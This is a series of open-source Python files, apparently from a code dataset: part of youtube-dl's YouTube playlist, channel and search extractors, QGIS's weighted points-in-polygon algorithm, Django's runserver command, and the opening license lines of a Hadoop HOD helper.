'upload_date': '20150526',
'license': 'Standard YouTube License',
'description': 'md5:507cdcb5a49ac0da37a920ece610be80',
'categories': ['People & Blogs'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
'add_ie': [YoutubeIE.ie_key()],
}, {
'url': 'https://youtu.be/yeWKywCrFtk?list=PL2qgrgXsNUG5ig9cat4ohreBjYLAPC0J5',
'info_dict': {
'id': 'yeWKywCrFtk',
'ext': 'mp4',
'title': 'Small Scale Baler and Braiding Rugs',
'uploader': 'Backus-Page House Museum',
'uploader_id': 'backuspagemuseum',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/backuspagemuseum',
'upload_date': '20161008',
'license': 'Standard YouTube License',
'description': 'md5:800c0c78d5eb128500bffd4f0b4f2e8a',
'categories': ['Nonprofits & Activism'],
'tags': list,
'like_count': int,
'dislike_count': int,
},
'params': {
'noplaylist': True,
'skip_download': True,
},
}, {
'url': 'https://youtu.be/uWyaPkt-VOI?list=PL9D9FC436B881BA21',
'only_matching': True,
}, {
'url': 'TLGGrESM50VT6acwMjAyMjAxNw',
'only_matching': True,
}, {
# music album playlist
'url': 'OLAK5uy_m4xAFdmMC5rX3Ji3g93pQe3hqLZw_9LhM',
'only_matching': True,
}]
def _real_initialize(self):
self._login()
def _extract_mix(self, playlist_id):
# The mixes are generated from a single video
# the id of the playlist is just 'RD' + video_id
ids = []
last_id = playlist_id[-11:]
for n in itertools.count(1):
url = 'https://youtube.com/watch?v=%s&list=%s' % (last_id, playlist_id)
webpage = self._download_webpage(
url, playlist_id, 'Downloading page {0} of Youtube mix'.format(n))
new_ids = orderedSet(re.findall(
r'''(?xs)data-video-username=".*?".*?
href="/watch\?v=([0-9A-Za-z_-]{11})&[^"]*?list=%s''' % re.escape(playlist_id),
webpage))
# Fetch new pages until all the videos are repeated, it seems that
# there are always 51 unique videos.
new_ids = [_id for _id in new_ids if _id not in ids]
if not new_ids:
break
ids.extend(new_ids)
last_id = ids[-1]
url_results = self._ids_to_results(ids)
search_title = lambda class_name: get_element_by_attribute('class', class_name, webpage)
title_span = (
search_title('playlist-title') or
search_title('title long-title') or
search_title('title'))
title = clean_html(title_span)
return self.playlist_result(url_results, playlist_id, title)
def _extract_playlist(self, playlist_id):
url = self._TEMPLATE_URL % playlist_id
page = self._download_webpage(url, playlist_id)
# the yt-alert-message now has tabindex attribute (see https://github.com/rg3/youtube-dl/issues/11604)
for match in re.findall(r'<div class="yt-alert-message"[^>]*>([^<]+)</div>', page):
match = match.strip()
# Check if the playlist exists or is private
mobj = re.match(r'[^<]*(?:The|This) playlist (?P<reason>does not exist|is private)[^<]*', match)
if mobj:
reason = mobj.group('reason')
message = 'This playlist %s' % reason
if 'private' in reason:
message += ', use --username or --netrc to access it'
message += '.'
raise ExtractorError(message, expected=True)
elif re.match(r'[^<]*Invalid parameters[^<]*', match):
raise ExtractorError(
'Invalid parameters. Maybe URL is incorrect.',
expected=True)
elif re.match(r'[^<]*Choose your language[^<]*', match):
continue
else:
self.report_warning('Youtube gives an alert message: ' + match)
playlist_title = self._html_search_regex(
r'(?s)<h1 class="pl-header-title[^"]*"[^>]*>\s*(.*?)\s*</h1>',
page, 'title', default=None)
_UPLOADER_BASE = r'class=["\']pl-header-details[^>]+>\s*<li>\s*<a[^>]+\bhref='
uploader = self._search_regex(
r'%s["\']/(?:user|channel)/[^>]+>([^<]+)' % _UPLOADER_BASE,
page, 'uploader', default=None)
mobj = re.search(
r'%s(["\'])(?P<path>/(?:user|channel)/(?P<uploader_id>.+?))\1' % _UPLOADER_BASE,
page)
if mobj:
uploader_id = mobj.group('uploader_id')
uploader_url = compat_urlparse.urljoin(url, mobj.group('path'))
else:
uploader_id = uploader_url = None
has_videos = True
if not playlist_title:
try:
# Some playlist URLs don't actually serve a playlist (e.g.
# https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4)
next(self._entries(page, playlist_id))
except StopIteration:
has_videos = False
playlist = self.playlist_result(
self._entries(page, playlist_id), playlist_id, playlist_title)
playlist.update({
'uploader': uploader,
'uploader_id': uploader_id,
'uploader_url': uploader_url,
})
return has_videos, playlist
def _check_download_just_video(self, url, playlist_id):
# Check if it's a video-specific URL
query_dict = compat_urlparse.parse_qs(compat_urlparse.urlparse(url).query)
video_id = query_dict.get('v', [None])[0] or self._search_regex(
r'(?:(?:^|//)youtu\.be/|youtube\.com/embed/(?!videoseries))([0-9A-Za-z_-]{11})', url,
'video id', default=None)
if video_id:
if self._downloader.params.get('noplaylist'):
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
return video_id, self.url_result(video_id, 'Youtube', video_id=video_id)
else:
self.to_screen('Downloading playlist %s - add --no-playlist to just download video %s' % (playlist_id, video_id))
return video_id, None
return None, None
def _real_extract(self, url):
# Extract playlist id
mobj = re.match(self._VALID_URL, url)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
playlist_id = mobj.group(1) or mobj.group(2)
video_id, video = self._check_download_just_video(url, playlist_id)
if video:
return video
if playlist_id.startswith(('RD', 'UL', 'PU')):
# Mixes require a custom extraction process
return self._extract_mix(playlist_id)
has_videos, playlist = self._extract_playlist(playlist_id)
if has_videos or not video_id:
return playlist
# Some playlist URLs don't actually serve a playlist (see
# https://github.com/rg3/youtube-dl/issues/10537).
# Fallback to plain video extraction if there is a video id
# along with playlist id.
return self.url_result(video_id, 'Youtube', video_id=video_id)
class YoutubeChannelIE(YoutubePlaylistBaseInfoExtractor):
IE_DESC = 'YouTube.com channels'
_VALID_URL = r'https?://(?:youtu\.be|(?:\w+\.)?youtube(?:-nocookie)?\.com)/channel/(?P<id>[0-9A-Za-z_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/channel/%s/videos'
_VIDEO_RE = r'(?:title="(?P<title>[^"]+)"[^>]+)?href="/watch\?v=(?P<id>[0-9A-Za-z_-]+)&?'
IE_NAME = 'youtube:channel'
_TESTS = [{
'note': 'paginated channel',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'playlist_mincount': 91,
'info_dict': {
'id': 'UUKfVa3S1e4PHvxWcwyMMg8w',
'title': 'Uploads from lex will',
}
}, {
'note': 'Age restricted channel',
# from https://www.youtube.com/user/DeusExOfficial
'url': 'https://www.youtube.com/channel/UCs0ifCMCm1icqRbqhUINa0w',
'playlist_mincount': 64,
'info_dict': {
'id': 'UUs0ifCMCm1icqRbqhUINa0w',
'title': 'Uploads from Deus Ex',
},
}]
@classmethod
def suitable(cls, url):
return (False if YoutubePlaylistsIE.suitable(url) or YoutubeLiveIE.suitable(url)
else super(YoutubeChannelIE, cls).suitable(url))
def _build_template_url(self, url, channel_id):
return self._TEMPLATE_URL % channel_id
def _real_extract(self, url):
channel_id = self._match_id(url)
url = self._build_template_url(url, channel_id)
# Channel by page listing is restricted to 35 pages of 30 items, i.e. 1050 videos total (see #5778)
# Workaround by extracting as a playlist if managed to obtain channel playlist URL
# otherwise fallback on channel by page extraction
channel_page = self._download_webpage(
url + '?view=57', channel_id,
'Downloading channel page', fatal=False)
if channel_page is False:
channel_playlist_id = False
else:
channel_playlist_id = self._html_search_meta(
'channelId', channel_page, 'channel id', default=None)
if not channel_playlist_id:
channel_url = self._html_search_meta(
('al:ios:url', 'twitter:app:url:iphone', 'twitter:app:url:ipad'),
channel_page, 'channel url', default=None)
if channel_url:
channel_playlist_id = self._search_regex(
r'vnd\.youtube://user/([0-9A-Za-z_-]+)',
channel_url, 'channel id', default=None)
if channel_playlist_id and channel_playlist_id.startswith('UC'):
playlist_id = 'UU' + channel_playlist_id[2:]
return self.url_result(
compat_urlparse.urljoin(url, '/playlist?list=%s' % playlist_id), 'YoutubePlaylist')
channel_page = self._download_webpage(url, channel_id, 'Downloading page #1')
autogenerated = re.search(r'''(?x)
class="[^"]*?(?:
channel-header-autogenerated-label|
yt-channel-title-autogenerated
)[^"]*"''', channel_page) is not None
if autogenerated:
# The videos are contained in a single page
# the ajax pages can't be used, they are empty
entries = [
self.url_result(
video_id, 'Youtube', video_id=video_id,
video_title=video_title)
for video_id, video_title in self.extract_videos_from_page(channel_page)]
return self.playlist_result(entries, channel_id)
try:
next(self._entries(channel_page, channel_id))
except StopIteration:
alert_message = self._html_search_regex(
r'(?s)<div[^>]+class=(["\']).*?\byt-alert-message\b.*?\1[^>]*>(?P<alert>[^<]+)</div>',
channel_page, 'alert', default=None, group='alert')
if alert_message:
raise ExtractorError('Youtube said: %s' % alert_message, expected=True)
return self.playlist_result(self._entries(channel_page, channel_id), channel_id)
class YoutubeUserIE(YoutubeChannelIE):
IE_DESC = 'YouTube.com user videos (URL or "ytuser" keyword)'
_VALID_URL = r'(?:(?:https?://(?:\w+\.)?youtube\.com/(?:(?P<user>user|c)/)?(?!(?:attribution_link|watch|results|shared)(?:$|[^a-z_A-Z0-9-])))|ytuser:)(?!feed/)(?P<id>[A-Za-z0-9_-]+)'
_TEMPLATE_URL = 'https://www.youtube.com/%s/%s/videos'
IE_NAME = 'youtube:user'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheLinuxFoundation',
'playlist_mincount': 320,
'info_dict': {
'id': 'UUfX55Sx5hEFjoC3cNs6mCUQ',
'title': 'Uploads from The Linux Foundation',
}
}, {
# Only available via https://www.youtube.com/c/12minuteathlete/videos
# but not https://www.youtube.com/user/12minuteathlete/videos
'url': 'https://www.youtube.com/c/12minuteathlete/videos',
'playlist_mincount': 249,
'info_dict': {
'id': 'UUVjM-zV6_opMDx7WYxnjZiQ',
'title': 'Uploads from 12 Minute Athlete',
}
}, {
'url': 'ytuser:phihag',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/gametrailers',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/gametrailers',
'only_matching': True,
}, {
# This channel is not available, geo restricted to JP
'url': 'https://www.youtube.com/user/kananishinoSMEJ/videos',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
# Don't return True if the url can be extracted with other youtube
# extractor, the regex would is too permissive and it would match.
other_yt_ies = iter(klass for (name, klass) in globals().items() if name.startswith('Youtube') and name.endswith('IE') and klass is not cls)
if any(ie.suitable(url) for ie in other_yt_ies):
return False
else:
return super(YoutubeUserIE, cls).suitable(url)
def _build_template_url(self, url, channel_id):
mobj = re.match(self._VALID_URL, url)
return self._TEMPLATE_URL % (mobj.group('user') or 'user', mobj.group('id'))
class YoutubeLiveIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com live streams'
_VALID_URL = r'(?P<base_url>https?://(?:\w+\.)?youtube\.com/(?:(?:user|channel|c)/)?(?P<id>[^/]+))/live'
IE_NAME = 'youtube:live'
_TESTS = [{
'url': 'https://www.youtube.com/user/TheYoungTurks/live',
'info_dict': {
'id': 'a48o2S1cPoo',
'ext': 'mp4',
'title': 'The Young Turks - Live Main Show',
'uploader': 'The Young Turks',
'uploader_id': 'TheYoungTurks',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheYoungTurks',
'upload_date': '20150715',
'license': 'Standard YouTube License',
'description': 'md5:438179573adcdff3c97ebb1ee632b891',
'categories': ['News & Politics'],
'tags': ['Cenk Uygur (TV Program Creator)', 'The Young Turks (Award-Winning Work)', 'Talk Show (TV Genre)'],
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.youtube.com/channel/UC1yBKRuGpC1tSM73A0ZjYjQ/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/CommanderVideoHq/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/TheYoungTurks/live',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
channel_id = mobj.group('id')
base_url = mobj.group('base_url')
webpage = self._download_webpage(url, channel_id, fatal=False)
if webpage:
page_type = self._og_search_property(
'type', webpage, 'page type', default='')
video_id = self._html_search_meta(
'videoId', webpage, 'video id', default=None)
if page_type.startswith('video') and video_id and re.match(
r'^[0-9A-Za-z_-]{11}$', video_id):
return self.url_result(video_id, YoutubeIE.ie_key())
return self.url_result(base_url)
class YoutubePlaylistsIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com user/channel playlists'
_VALID_URL = r'https?://(?:\w+\.)?youtube\.com/(?:user|channel)/(?P<id>[^/]+)/playlists'
IE_NAME = 'youtube:playlists'
_TESTS = [{
'url': 'https://www.youtube.com/user/ThirstForScience/playlists',
'playlist_mincount': 4,
'info_dict': {
'id': 'ThirstForScience',
'title': 'Thirst for Science',
},
}, {
# with "Load more" button
'url': 'https://www.youtube.com/user/igorkle1/playlists?view=1&sort=dd',
'playlist_mincount': 70,
'info_dict': {
'id': 'igorkle1',
'title': 'Игорь Клейнер',
},
}, {
'url': 'https://www.youtube.com/channel/UCiU1dHvZObB2iP6xkJ__Icw/playlists',
'playlist_mincount': 17,
'info_dict': {
'id': 'UCiU1dHvZObB2iP6xkJ__Icw',
'title': 'Chem Player',
},
}]
class YoutubeSearchBaseInfoExtractor(YoutubePlaylistBaseInfoExtractor):
_VIDEO_RE = r'href="\s*/watch\?v=(?P<id>[0-9A-Za-z_-]{11})(?:[^"]*"[^>]+\btitle="(?P<title>[^"]+))?'
class YoutubeSearchIE(SearchInfoExtractor, YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com searches'
# there doesn't appear to be a real limit, for example if you search for
# 'python' you get more than 8.000.000 results
_MAX_RESULTS = float('inf')
IE_NAME = 'youtube:search'
_SEARCH_KEY = 'ytsearch'
_EXTRA_QUERY_ARGS = {}
_TESTS = []
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
videos = []
limit = n
url_query = {
'search_query': query.encode('utf-8'),
}
url_query.update(self._EXTRA_QUERY_ARGS)
result_url = 'https://www.youtube.com/results?' + compat_urllib_parse_urlencode(url_query)
for pagenum in itertools.count(1):
data = self._download_json(
result_url, video_id='query "%s"' % query,
note='Downloading page %s' % pagenum,
errnote='Unable to download API page',
query={'spf': 'navigate'})
html_content = data[1]['body']['content']
if 'class="search-message' in html_content:
raise ExtractorError(
'[youtube] No video results', expected=True)
new_videos = list(self._process_page(html_content))
videos += new_videos
if not new_videos or len(videos) > limit:
break
next_link = self._html_search_regex(
r'href="(/results\?[^"]*\bsp=[^"]+)"[^>]*>\s*<span[^>]+class="[^"]*\byt-uix-button-content\b[^"]*"[^>]*>Next',
html_content, 'next link', default=None)
if next_link is None:
break
result_url = compat_urlparse.urljoin('https://www.youtube.com/', next_link)
if len(videos) > n:
videos = videos[:n]
return self.playlist_result(videos, query)
class YoutubeSearchDateIE(YoutubeSearchIE):
IE_NAME = YoutubeSearchIE.IE_NAME + ':date'
_SEARCH_KEY = 'ytsearchdate'
IE_DESC = 'YouTube.com searches, newest videos first'
_EXTRA_QUERY_ARGS = {'search_sort': 'video_date_uploaded'}
class YoutubeSearchURLIE(YoutubeSearchBaseInfoExtractor):
IE_DESC = 'YouTube.com search URLs'
IE_NAME = 'youtube:search_url'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/results\?(.*?&)?(?:search_query|q)=(?P<query>[^&]+)(?:[&]|$)'
_TESTS = [{
'url': 'https://www.youtube.com/results?baz=bar&search_query=youtube-dl+test+video&filters=video&lclk=video',
'playlist_mincount': 5,
'info_dict': {
'title': 'youtube-dl test video',
}
}, {
'url': 'https://www.youtube.com/results?q=test&sp=EgQIBBgB',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
query = compat_urllib_parse_unquote_plus(mobj.group('query'))
webpage = self._download_webpage(url, query)
return self.playlist_result(self._process_page(webpage), playlist_title=query)
class YoutubeShowIE(YoutubePlaylistsBaseInfoExtractor):
IE_DESC = 'YouTube.com (multi-season) shows'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/show/(?P<id>[^?#]*)'
IE_NAME = 'youtube:show'
_TESTS = [{
'url': 'https://www.youtube.com/show/airdisasters',
'playlist_mincount': 5,
'info_dict': {
'id': 'airdisasters',
'title': 'Air Disasters',
}
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
return super(YoutubeShowIE, self)._real_extract(
'https://www.youtube.com/show/%s/playlists' % playlist_id)
class YoutubeFeedsInfoExtractor(YoutubeBaseInfoExtractor):
"""
Base class for feed extractors
Subclasses must define the _FEED_NAME and _PLAYLIST_TITLE properties.
"""
_LOGIN_REQUIRED = True
@property
def IE_NAME(self):
return 'youtube:%s' % self._FEED_NAME
def _real_initialize(self):
self._login()
def _entries(self, page):
# The extraction process is the same as for playlists, but the regex
# for the video ids doesn't contain an index
ids = []
more_widget_html = content_html = page
for page_num in itertools.count(1):
matches = re.findall(r'href="\s*/watch\?v=([0-9A-Za-z_-]{11})', content_html)
# 'recommended' feed has infinite 'load more' and each new portion spins
# the same videos in (sometimes) slightly different order, so we'll check
# for unicity and break when portion has no new videos
new_ids = list(filter(lambda video_id: video_id not in ids, orderedSet(matches)))
if not new_ids:
break
ids.extend(new_ids)
for entry in self._ids_to_results(new_ids):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), self._PLAYLIST_TITLE,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
more_widget_html = more['load_more_widget_html']
def _real_extract(self, url):
page = self._download_webpage(
'https://www.youtube.com/feed/%s' % self._FEED_NAME,
self._PLAYLIST_TITLE)
return self.playlist_result(
self._entries(page), playlist_title=self._PLAYLIST_TITLE)
class YoutubeWatchLaterIE(YoutubePlaylistIE):
IE_NAME = 'youtube:watchlater'
IE_DESC = 'Youtube watch later list, ":ytwatchlater" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/(?:feed/watch_later|(?:playlist|watch)\?(?:.+&)?list=WL)|:ytwatchlater'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=WL',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?v=bCNU9TrbiRk&index=1&list=WL',
'only_matching': True,
}]
def _real_extract(self, url):
_, video = self._check_download_just_video(url, 'WL')
if video:
return video
_, playlist = self._extract_playlist('WL')
return playlist
class YoutubeFavouritesIE(YoutubeBaseInfoExtractor):
IE_NAME = 'youtube:favorites'
IE_DESC = 'YouTube.com favourite videos, ":ytfav" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/my_favorites|:ytfav(?:ou?rites)?'
_LOGIN_REQUIRED = True
def _real_extract(self, url):
webpage = self._download_webpage('https://www.youtube.com/my_favorites', 'Youtube Favourites videos')
playlist_id = self._search_regex(r'list=(.+?)["&]', webpage, 'favourites playlist id')
return self.url_result(playlist_id, 'YoutubePlaylist')
class YoutubeRecommendedIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com recommended videos, ":ytrec" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/recommended|:ytrec(?:ommended)?'
_FEED_NAME = 'recommended'
_PLAYLIST_TITLE = 'Youtube Recommended videos'
class YoutubeSubscriptionsIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com subscriptions feed, "ytsubs" keyword (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/subscriptions|:ytsubs(?:criptions)?'
_FEED_NAME = 'subscriptions'
_PLAYLIST_TITLE = 'Youtube Subscriptions'
class YoutubeHistoryIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'Youtube watch history, ":ythistory" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/history|:ythistory'
_FEED_NAME = 'history'
_PLAYLIST_TITLE = 'Youtube History'
class YoutubeTruncatedURLIE(InfoExtractor):
IE_NAME = 'youtube:truncated_url'
IE_DESC = False # Do not list
_VALID_URL = r'''(?x)
(?:https?://)?
(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/
(?:watch\?(?:
feature=[a-z_]+|
annotation_id=annotation_[^&]+|
x-yt-cl=[0-9]+|
hl=[^&]*|
t=[0-9]+
)?
|
attribution_link\?a=[^&]+
)
$
'''
_TESTS = [{
'url': 'https://www.youtube.com/watch?annotation_id=annotation_3951667041',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?x-yt-cl=84503534',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?feature=foo',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?hl=en-GB',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?t=2372',
'only_matching': True,
}]
def _real_extract(self, url):
raise ExtractorError(
'Did you forget to quote the URL? Remember that & is a meta '
'character in most shells, so you want to put the URL in quotes, '
'like youtube-dl '
'"https://www.youtube.com/watch?feature=foo&v=BaW_jenozKc" '
' or simply youtube-dl BaW_jenozKc .',
expected=True)
class YoutubeTruncatedIDIE(InfoExtractor):
IE_NAME = 'youtube:truncated_id'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/watch\?v=(?P<id>[0-9A-Za-z_-]{1,10})$'
_TESTS = [{
'url': 'https://www.youtube.com/watch?v=N_708QY7Ob',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
raise ExtractorError(
'Incomplete YouTube ID %s. URL %s looks truncated.' % (video_id, url),
expected=True)
| gpl-3.0 | -7,517,958,334,063,962,000 | 44.275542 | 348 | 0.505638 | false |
michaelkirk/QGIS | python/plugins/processing/algs/qgis/PointsInPolygonWeighted.py | 1 | 5085 | # -*- coding: utf-8 -*-
"""
***************************************************************************
PointsInPolygon.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QgsField, QgsFeatureRequest, QgsFeature, QgsGeometry
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterString
from processing.core.parameters import ParameterTableField
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
class PointsInPolygonWeighted(GeoAlgorithm):
POLYGONS = 'POLYGONS'
POINTS = 'POINTS'
OUTPUT = 'OUTPUT'
FIELD = 'FIELD'
WEIGHT = 'WEIGHT'
# =========================================================================
# def getIcon(self):
# return QIcon(os.path.dirname(__file__) + "/icons/sum_points.png")
# =========================================================================
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Count points in polygon(weighted)')
self.group, self.i18n_group = self.trAlgorithm('Vector analysis tools')
self.addParameter(ParameterVector(self.POLYGONS,
self.tr('Polygons'), [ParameterVector.VECTOR_TYPE_POLYGON]))
self.addParameter(ParameterVector(self.POINTS,
self.tr('Points'), [ParameterVector.VECTOR_TYPE_POINT]))
self.addParameter(ParameterTableField(self.WEIGHT,
self.tr('Weight field'), self.POINTS))
self.addParameter(ParameterString(self.FIELD,
self.tr('Count field name'), 'NUMPOINTS'))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Weighted count')))
def processAlgorithm(self, progress):
polyLayer = dataobjects.getObjectFromUri(self.getParameterValue(self.POLYGONS))
pointLayer = dataobjects.getObjectFromUri(self.getParameterValue(self.POINTS))
fieldName = self.getParameterValue(self.FIELD)
fieldIdx = pointLayer.fieldNameIndex(self.getParameterValue(self.WEIGHT))
polyProvider = polyLayer.dataProvider()
fields = polyProvider.fields()
fields.append(QgsField(fieldName, QVariant.Int))
(idxCount, fieldList) = vector.findOrCreateField(polyLayer,
polyLayer.pendingFields(), fieldName)
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(
fields.toList(), polyProvider.geometryType(), polyProvider.crs())
spatialIndex = vector.spatialindex(pointLayer)
ftPoint = QgsFeature()
outFeat = QgsFeature()
geom = QgsGeometry()
current = 0
hasIntersections = False
features = vector.features(polyLayer)
total = 100.0 / float(len(features))
for ftPoly in features:
geom = ftPoly.geometry()
attrs = ftPoly.attributes()
count = 0
hasIntersections = False
points = spatialIndex.intersects(geom.boundingBox())
if len(points) > 0:
hasIntersections = True
if hasIntersections:
progress.setText(str(len(points)))
for i in points:
request = QgsFeatureRequest().setFilterFid(i)
ftPoint = pointLayer.getFeatures(request).next()
tmpGeom = QgsGeometry(ftPoint.geometry())
if geom.contains(tmpGeom):
weight = str(ftPoint.attributes()[fieldIdx])
try:
count += float(weight)
except:
# Ignore fields with non-numeric values
pass
outFeat.setGeometry(geom)
if idxCount == len(attrs):
attrs.append(count)
else:
attrs[idxCount] = count
outFeat.setAttributes(attrs)
writer.addFeature(outFeat)
current += 1
progress.setPercentage(int(current * total))
del writer
| gpl-2.0 | -7,380,120,518,761,429,000 | 38.726563 | 89 | 0.551426 | false |
xrg/django-static-gitified | django/core/management/commands/runserver.py | 77 | 5859 | from optparse import make_option
import os
import re
import sys
import socket
from django.core.management.base import BaseCommand, CommandError
from django.core.servers.basehttp import AdminMediaHandler, run, WSGIServerException, get_internal_wsgi_application
from django.utils import autoreload
naiveip_re = re.compile(r"""^(?:
(?P<addr>
(?P<ipv4>\d{1,3}(?:\.\d{1,3}){3}) | # IPv4 address
(?P<ipv6>\[[a-fA-F0-9:]+\]) | # IPv6 address
(?P<fqdn>[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*) # FQDN
):)?(?P<port>\d+)$""", re.X)
DEFAULT_PORT = "8000"
class BaseRunserverCommand(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--ipv6', '-6', action='store_true', dest='use_ipv6', default=False,
help='Tells Django to use a IPv6 address.'),
make_option('--nothreading', action='store_false', dest='use_threading', default=True,
help='Tells Django to NOT use threading.'),
make_option('--noreload', action='store_false', dest='use_reloader', default=True,
help='Tells Django to NOT use the auto-reloader.'),
)
help = "Starts a lightweight Web server for development."
args = '[optional port number, or ipaddr:port]'
# Validation is called explicitly each time the server is reloaded.
requires_model_validation = False
def get_handler(self, *args, **options):
"""
Returns the default WSGI handler for the runner.
"""
return get_internal_wsgi_application()
def handle(self, addrport='', *args, **options):
self.use_ipv6 = options.get('use_ipv6')
if self.use_ipv6 and not socket.has_ipv6:
raise CommandError('Your Python does not support IPv6.')
if args:
raise CommandError('Usage is runserver %s' % self.args)
self._raw_ipv6 = False
if not addrport:
self.addr = ''
self.port = DEFAULT_PORT
else:
m = re.match(naiveip_re, addrport)
if m is None:
raise CommandError('"%s" is not a valid port number '
'or address:port pair.' % addrport)
self.addr, _ipv4, _ipv6, _fqdn, self.port = m.groups()
if not self.port.isdigit():
raise CommandError("%r is not a valid port number." % self.port)
if self.addr:
if _ipv6:
self.addr = self.addr[1:-1]
self.use_ipv6 = True
self._raw_ipv6 = True
elif self.use_ipv6 and not _fqdn:
raise CommandError('"%s" is not a valid IPv6 address.' % self.addr)
if not self.addr:
self.addr = self.use_ipv6 and '::1' or '127.0.0.1'
self._raw_ipv6 = bool(self.use_ipv6)
self.run(*args, **options)
def run(self, *args, **options):
"""
Runs the server, using the autoreloader if needed
"""
use_reloader = options.get('use_reloader')
if use_reloader:
autoreload.main(self.inner_run, args, options)
else:
self.inner_run(*args, **options)
def inner_run(self, *args, **options):
from django.conf import settings
from django.utils import translation
threading = options.get('use_threading')
shutdown_message = options.get('shutdown_message', '')
quit_command = (sys.platform == 'win32') and 'CTRL-BREAK' or 'CONTROL-C'
self.stdout.write("Validating models...\n\n")
self.validate(display_num_errors=True)
self.stdout.write((
"Django version %(version)s, using settings %(settings)r\n"
"Development server is running at http://%(addr)s:%(port)s/\n"
"Quit the server with %(quit_command)s.\n"
) % {
"version": self.get_version(),
"settings": settings.SETTINGS_MODULE,
"addr": self._raw_ipv6 and '[%s]' % self.addr or self.addr,
"port": self.port,
"quit_command": quit_command,
})
# django.core.management.base forces the locale to en-us. We should
# set it up correctly for the first request (particularly important
# in the "--noreload" case).
translation.activate(settings.LANGUAGE_CODE)
try:
handler = self.get_handler(*args, **options)
run(self.addr, int(self.port), handler,
ipv6=self.use_ipv6, threading=threading)
except WSGIServerException, e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
13: "You don't have permission to access that port.",
98: "That port is already in use.",
99: "That IP address can't be assigned-to.",
}
try:
error_text = ERRORS[e.args[0].args[0]]
except (AttributeError, KeyError):
error_text = str(e)
sys.stderr.write(self.style.ERROR("Error: %s" % error_text) + '\n')
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
self.stdout.write("%s\n" % shutdown_message)
sys.exit(0)
class Command(BaseRunserverCommand):
option_list = BaseRunserverCommand.option_list + (
make_option('--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.'),
)
def get_handler(self, *args, **options):
"""
Serves admin media like old-school (deprecation pending).
"""
handler = super(Command, self).get_handler(*args, **options)
return AdminMediaHandler(handler, options.get('admin_media_path'))
| bsd-3-clause | 7,937,914,613,567,935,000 | 40.260563 | 115 | 0.574501 | false |
dongpf/hadoop-0.19.1 | src/contrib/hod/testing/helper.py | 182 | 1122 | #Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
